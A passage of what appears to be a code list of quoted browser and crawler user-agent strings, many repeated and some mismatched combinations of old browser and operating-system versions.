'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
